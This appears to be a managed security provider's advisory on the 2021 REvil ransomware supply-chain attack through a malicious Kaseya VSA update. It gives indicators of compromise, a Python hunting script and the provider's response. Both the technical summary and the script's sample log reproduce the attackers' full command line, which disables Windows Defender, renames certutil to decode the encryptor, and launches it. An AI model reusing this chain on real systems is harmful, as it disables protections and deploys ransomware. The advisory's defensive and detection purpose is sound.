REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update
Posted Date: 07/02/2021
Published Date: 07/02/2021
Source: Kaseya
Sector: Information Technology & Information Security
DATE(S) ISSUED: 07/02/2021
SUBJECT: Supply Chain Attack – Malicious Kaseya Update Executing Malware by REvil Group
OVERVIEW: “The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions, and is using a malicious update for the VSA software to deploy ransomware to companies across the world.
The incident first came to light earlier today in a Reddit section dedicated to managed service providers (MSPs), companies that provide remote IT services to smaller businesses lacking an IT department and which are usually Kaseya’s primary customers.
MSPs use Kaseya’s VSA platform to manage and deploy software updates to customer networks or access remote systems to troubleshoot a customer’s IT problems; however, this very same functionality can be abused by threat actors who manage to gain access to an MSP’s VSA platform.
While at the time of writing, it is unclear how widespread the incident is, security firm Huntress Labs is reporting that at least four MSPs have been hit so far. However, VSA is also used by regular businesses to manage large computer fleets, meaning the incident is also most likely impacting non-MSP entities as well.
According to security firm Sophos, which has also detected the attack via its antivirus telemetry, victims appear to be getting infected with ransomware via a malicious update to Kaseya VSA on-prem servers that disables local antivirus solutions and then deploys a fake Windows Defender app that encrypts local files.”
THREAT INTELLIGENCE: “We are tracking 8 MSPs where this has happened and working in close collaboration with two of them. Although all four are running Kaseya VSA, we have not validated that VSA is being exploited (not fair at this time to say "Kaseya has been hacked" without evidence).”
Kaseya's official recommendation is to: "IMMEDIATELY shut down your VSA server until you receive further notice from us.
We are experiencing a potential attack against the VSA that has been limited to a small number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution, but we recommend that you IMMEDIATELY shut down your VSA server until you receive further notice from us. It's critical that you do this immediately, because one of the first things the attacker does is shut off administrative access to the VSA."
SYSTEMS AFFECTED: Kaseya VSA Servers - Windows
RISK: Managed Service Providers (MSPs), that is, companies that provide remote IT services or remote system access to other companies, are affected by this threat.
Kaseya VSA is also used by medium and large non-MSP businesses, so the attack is not limited to MSPs and affects non-MSP entities as well.
TECHNICAL SUMMARY: Here are the validated indicators of compromise known at this time:
- Ransomware encryptor is dropped to c:\kworking\agent.exe
- The VSA procedure is named "Kaseya VSA Agent Hot-fix"
- At least two tasks run the following command line. It delays execution with a long ping loop, disables Windows Defender protections through Set-MpPreference, copies certutil.exe to C:\Windows\cert.exe and appends random bytes to change its hash, uses that copy to decode the encryptor from agent.crt, deletes both artifacts and then launches the encryptor:
  "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Other possible Indicators of Compromise (IOCs) identified (VirusTotal):
  MD5: 561cffbaba71a6e8cc1cdceda990ead4
  SHA-1: 5162f14d75e96edb914d1756349d6e11583db0b0
  SHA-256: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
  Vhash: 095056655d15656az47!z
  Authentihash: c9d30e7bf92c0bb67331c3526580a45d8446c785e4c671f55c957f53b285158f
  Imphash: 59349b1648eddf021c01f05a17a0e870
  Rich PE header hash: 60c050aad9e163c9893ac438cc74b2bf
  SSDEEP: 24576:vMz7ETDWX4XukZeVL/kYx9P/JY6gfjcsAE:kfF7k4pB/JYPIsAE
  TLSH: T1D915BF03F6C199B2F5DF013960B2577E8D3AAE158729D9D39B9038668D312D06B3F389
  File type: Win32 EXE
  Magic: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
  TrID: Windows Control Panel Item (generic) (88.3%); Win64 Executable (generic) (4.7%); Win16 NE executable (generic) (2.2%); Win32 Executable (generic) (2%); OS/2 Executable (generic) (0.9%)
  File size: 890.88 KB (912264 bytes)
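As an added example (not tooling from Kaseya, Huntress or CyFlare), the following Python script shows how a defender could hunt for the indicators above in exported process-creation telemetry and check a recovered file against the listed hashes. The behavioural rules are derived from the command line quoted in the TECHNICAL SUMMARY; the pipe-delimited export format and the sample log records are constructed assumptions for this illustration.

```python
"""Hunt for the Kaseya VSA / REvil indicators listed in this advisory.

Added example, not Kaseya, Huntress or CyFlare code. The indicator values
come from the advisory; the log format and sample records are constructed.
"""
import hashlib
import re

# Encryptor hashes as listed in the advisory (VirusTotal entry).
KNOWN_HASHES = {
    "md5": "561cffbaba71a6e8cc1cdceda990ead4",
    "sha1": "5162f14d75e96edb914d1756349d6e11583db0b0",
    "sha256": "d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e",
}

# Behavioural rules taken from the VSA procedure's command line.
# Each entry: (rule name, case-insensitive regex over the command line).
RULES = [
    # ping loop against localhost used as a sleep before the payload runs
    ("ping_sleep", re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+\d+", re.I)),
    # Defender real-time protection switched off via Set-MpPreference
    ("defender_tamper",
     re.compile(r"set-mppreference\s+.*-disablerealtimemonitoring", re.I)),
    # certutil.exe copied to C:\Windows\cert.exe (renamed LOLBin)
    ("certutil_copy",
     re.compile(r"copy\s+/y\s+.*certutil\.exe\s+c:\\windows\\cert\.exe", re.I)),
    # the copy used to base64-decode the encryptor from agent.crt
    ("certutil_decode",
     re.compile(r"cert\.exe\s+-decode\s+c:\\kworking\\agent\.crt", re.I)),
    # any reference to the dropped encryptor path
    ("kworking_agent", re.compile(r"c:\\kworking\\agent\.exe", re.I)),
]


def match_command_line(cmdline):
    """Return the names of every rule that fires on one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def hash_matches(data):
    """Return which of the advisory's digests a file's bytes match."""
    digests = {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }
    return [algo for algo, h in digests.items() if h == KNOWN_HASHES[algo]]


def hunt(log_lines):
    """Scan 'timestamp|host|image|command line' records and return hits.

    The pipe-delimited layout is an assumed export format (e.g. from an EDR
    or Sysmon event 1 pipeline); adapt the split for your own telemetry.
    """
    hits = []
    for line in log_lines:
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue  # malformed record, skip rather than crash the hunt
        ts, host, image, cmd = parts
        fired = match_command_line(cmd)
        if fired:
            hits.append({"time": ts, "host": host, "image": image, "rules": fired})
    return hits


# Constructed sample records (not real telemetry). The first reproduces the
# advisory's command line; the other two are benign look-alikes that must
# not fire (certutil used for hashing, a read-only Defender query).
SAMPLE_LOG = [
    "2021-07-02T14:05:11Z|WS01|C:\\WINDOWS\\system32\\cmd.exe|"
    "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ping 127.0.0.1 -n 4979 > nul & "
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "Set-MpPreference -DisableRealtimeMonitoring $true "
    "-DisableIntrusionPreventionSystem $true & "
    "copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe & "
    "C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & "
    "c:\\kworking\\agent.exe",
    "2021-07-02T14:06:40Z|WS01|C:\\Windows\\System32\\certutil.exe|"
    "certutil.exe -hashfile C:\\Users\\admin\\setup.msi SHA256",
    "2021-07-02T14:07:02Z|WS02|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe Get-MpPreference",
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit["time"], hit["host"], ", ".join(hit["rules"]))
```

Several rules firing on one command line is the strong signal here; a single rule such as kworking_agent on its own can also be matched against file-creation events for c:\kworking\agent.exe. The VSA procedure name "Kaseya VSA Agent Hot-fix" is not a process event and should be checked in the VSA server's procedure list directly.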
ACTIONS TAKEN: The CyFlare SOC is closely monitoring the situation as updates continue to arise from Kaseya and the public. We also have word from one of our affected customers that Kaseya, as a precaution, shut down the entire SaaS architecture so they can examine everyone’s instances to be sure this is isolated to on-prem folks.
At this time, we do not believe any of our customers utilizing Kaseya is compromised. This conclusion is the result of threat hunting searches for the indicators of compromise listed above, performed across each affected customer's environment and the security solutions CyFlare manages.
For our managed endpoint and SentinelOne MDR customers we have also implemented a global blacklist on one key IOC: the SHA-1 hash identified as the Kaseya VSA ransomware encryptor hash.
As more details on this emerging threat arise through the cyber community or through Kaseya notices, your SOC will continue to address them. If there are any further updates, or any indication that one of our affected customers is compromised, we will engage you immediately.
If you have any further questions, comments, or concerns regarding this threat, please do not hesitate to contact your SOC at CyFlare. The SOC can be reached via email, ticket, or phone call to our support center.